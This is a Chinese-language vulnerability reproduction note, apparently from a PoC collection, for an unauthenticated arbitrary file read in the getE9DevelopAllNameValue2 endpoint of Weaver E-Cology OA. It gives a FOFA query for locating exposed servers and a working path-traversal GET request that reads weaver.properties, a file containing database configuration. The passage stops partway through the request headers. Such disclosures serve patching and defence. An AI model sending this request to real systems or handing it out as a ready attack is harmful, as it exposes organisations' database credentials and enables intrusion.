0x01 产品简介
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微E-Cology 依托全新的设计理念,全新的管理思想。为中大型组织创建全新的高效协同办公环境。能语音办公,简化软件操作界面。身份认证、电子签名、电子签章、数据存证让合同全程数字化,后端7大引擎,满足组织集成化、个性化应用需求。
0x02 漏洞概述
泛微E-Cology getE9DevelopAllNameValue2接口处任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 复现环境
FOFA:app="泛微-OA(e-cology)"
0x04 漏洞复现
PoC
GET /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_/../weaver.properties HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; PPC Mac OS 
